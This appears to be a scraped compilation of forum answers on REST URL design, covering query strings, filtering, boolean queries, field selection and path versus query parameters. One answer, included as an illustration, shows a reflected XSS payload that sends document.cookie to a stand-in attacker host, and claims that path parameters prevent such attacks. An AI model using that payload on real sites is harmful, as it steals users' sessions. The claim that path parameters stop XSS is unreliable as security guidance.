Restful URL design full text search on any specified field

Restful URL design full text search on any specified field - rest

My api should support text search on specified fields. So I am thinking what kind of URL style handles it in the best way.
The below pattern, using "q" ,is mentioned in many blogs and documents to be used for full text search but I also need to specify field names:
GET /groups?q=bank+org
So I am thinking to use wildcards like below:
GET /groups?name=*bank*&owner=*org*
I am just wondering if this is aligned with the best practices in the market?
Thanks

Soheil, you are thinking right. "Search" is a "filter parameter" wich always go in the Query String.

When sending parameters that will be used to query a collection of resources you should use... Guess what! Query parameters!
As far as I know, there's no official documentation that states that. It's a common approach and it's widely adopted. The only offical documentation about query string that I'm aware of is the RFC 3986. Quoting:
3.4. Query
The query component contains non-hierarchical data that, along with
data in the path component, serves to identify a
resource within the scope of the URI's scheme and naming authority
(if any). The query component is indicated by the first question
mark ("?") character and terminated by a number sign ("#") character
or by the end of the URI. [...]
For a full text search, you can choose the parameter you find most convenient. Do you think q is a good one? Go for it! But provide a good documentation for it.

Related

REST Protocol for searching and filtering

The standard REST verb for returning a value GET can take different parameters to select what to "get". Often there is one that takes an id to get a single value, and often some sort of search criteria to get a list.
Is there a standard way to specify the filtering and sorting of the data that is being searched for? For example, if I have an invoice record I'd like to write a GET query that says "give me all invoices for customer 123, with total > $345 and return in descending order of date".
If I were writing this myself I'd have something like:
GET http://example.com/mydata?query="customer=123&&total>345.00"&order="date"
(Note I didn't urlencode the url for clarity, though obviously that is required in practice, but I hope you get what I mean.)
I can certainly write something for this, but I am wondering if there is a standardized way to do this?

Is there a standard way to specify the filtering and sorting of the data that is being searched for?
Not that I'm aware of.
Note that HTTP doesn't really have queries (yet); HTTP has resource identifiers.
We've got a standard for resource identifiers (RFC 3986) and a standard for URI templates (RFC 6570) that describes how to produce a range of identifiers via variable expansion.
But as far as I can tell there is no published "standard" that automatically transforms a URI into a SQL query.
It's possible that one of the "convention over configuration" frameworks (ex: Rails) might have something useful here, but I haven't found it.

RESTful query API design

I want to ask what is the most RESTful way for queries, I have this existing API
/entities/users?skip=0&limit=100&queries={"$find":{"$minus":{"$find":{"username":"markzu"}}}}
Easily the first parts of the query, skip and limit are easily identifiable however I find the "queries" part quite confusing for others. What the query means is to
Find every User minus Find User entities with username 'markzu'
The reason it is defined this way is due to the internal database query behavior.
Meaning in the NoSQL database we use, the resource run two transactional queries, first is to find everything in the User table minus a find User with a username that was specified (similar to SQL) -- boolean operations. So in other words, the query means, "fetch every User except username 'markzu' "
What is the proper way to define this in RESTful way, based on standards?

What is the proper way to define this in RESTful way, based on standards?
REST doesn't care what spelling you use for resource identifiers, so long as your choice is consistent with the production rules defined in RFC 3986.
However, we do have a standard for URI Templates
A URI Template is a compact sequence of characters for describing a range of Uniform Resource Identifiers through variable expansion.
You are already aware of the most familiar form of URI template -- key-value pairs encoded in the query string.
?skip=0&limit=100&username=markzu
That's often a convenient choice, because HTML understands how to process forms into url encoded queries.
It doesn't look like you need any other parameters, you just need to be able this query from others. So a perfectly reasonable choice might be
/every-user-except?skip=0&limit=100&username=markzu
It may help to think "prepared statement", rather than "query".
The underlying details of the implementation really shouldn't enter into the calculation at all. Your REST API is a facade that makes your app look like an HTTP aware key value store.

Boolean logic in RESTful filtering and queries

This is sort of a follow-up to someone else's question about filtering/querying a list of cars. There the recommendation for a RESTful filtering request was to put filter expressions in the query of the URI, like this:
/cars?color=blue&type=sedan&doors=4
That's fine. But what if my filtering query becomes more complicated and I need to use Boolean operators, such as:
((color=blue OR type=sedan) AND doors=4) OR color=red
That is, I want to find a four-door blue car or a four-door sedan, but if the car is red I'll take it without caring about any of the other properties.
Is there any sort of convention for providing Boolean expressions in a RESTful URI's query parameters? I suppose I could by create some new querying expression language and put it in a POST, but that seems like a heavy and proprietary approach. How are others solving this?

It is perfectly okay to use
/cars/color:blue/type:sedan/doors:4
instead of
/cars?color=blue&type=sedan&doors=4
The URL standard says only that the path should contain the hierarchical part, and the query should contain the non-hierarchical. Since this is a map-reduce, using / is perfectly valid.
In your case you need a query language to describe your filters. If I were you I would copy an already existing solution, for example the query language of a noSQL database which has a REST API.
I think resource query language is what you need. I think you could use it like this:
/sthg?q="(foo=3|foo=bar)&price=lt=10"
or forget the default queryString parser, and like this:
/sthg?(foo=3|foo=bar)&price=lt=10
I suggest you to read the manual for further details.
Since I found no other URL compatible query language (yet), I think the only other option to serialize another query language and send it in a param, like SparSQL
http://localhost:8003/v1/graphs/sparql?query=your-urlencoded-query
by marklogic7. Hydra defines a freeTextQuery in its vocab, so they follow the same approach. But I'll ask Markus about this. It's a complicated topic, since according to the self-descriptive messages constraint you should describe somewhere what type of query language you use in the URL. I am not sure about this. :S
conclusion:
In order to support ad-hoc search queries we need a standard way to describe them in the link meta-data. Currently there are only a few standards about this. The most widely used standard is URI templates which does not support nested statements, operators, etc... for what I know. There is a draft called link descriptions which tries to fill the gap, but it is incomplete.
One possible workaround to define an URI template with a single q parameter which has rdf:type of x:SearchQuery and rdfs:range of xsd:string, and create another vocab about how to describe such a x:SearchQuery. After that the description could be used to build search forms, and validate queries sent to the server. Already existing queries could be supported too with this approach, so we don't need a new one.
So this problem can be solved with vocabs or new URI template standards.

I have seen many use a query string as you have provided - much like a SQL query string.
Here are just two examples:
Socrata (Open Data Portal company)'s SoQL (SQL variant): http://dev.socrata.com/consumers/cookbooks/querying-block-ranges.html
openFDA (API from fda.gov for open data) uses a similar string-based query parameter which maps to ElasticSearch queries, I believe: https://open.fda.gov/api/reference/#query-syntax

Try using 1 for true, 0 for false.
/_api/web/lists/getbytitle('XYZ')/items?$filter=Active eq 1

REST Field filter use

I'm designing a RESTful API and I'm asking myself question about the filter field.
On my gets queries I want the user to be able to select the fields he want to get in the response. I was pretty sure that it would be the field filter jobs to give me the requested field but, after some reshearch, I found that most of the time it's used to add criteria on the fields, as a IF. Is it the user that needs to make show or hide the fields ans the Api return the full ressource everytime ?
I got an other question which is about the URI representation of such filter. Should it be something like /foo?fields=[bar1,bar2] ?
Thanks

It's not common to have a resource where you can specify what fields you want returned, by default all fields will get returned. If your resource has a lot of fields or some fields have really big values, it can be a good idea to have a way to specify which fields you want returned.
In REST there are no strict rules about how you should design your URLs for filters. It is indeed common to use GET parameters because they can be optional and don't have to be in any specific order. Your proposal of /foo?fields=[bar1,bar2] seems fine, however i would personally leave off the brackets.

Google Compute Engine API uses the 'fields' request parameter (see the documentation). The syntax is flexible enough to let user select/restrict even the nested elements. You may find it useful.

Yoga is a framework that allows you to deploy your own REST API's with selectable fields. This can reduce roundtrips to the server, and improve performance.

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.

There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.

In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".

There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.

IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)

The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.

The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.

This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>

The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.

By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.
By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.

Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.

We Keep Coding

iphone swift flutter scala powershell matlab mongodb postgresql perl eclipse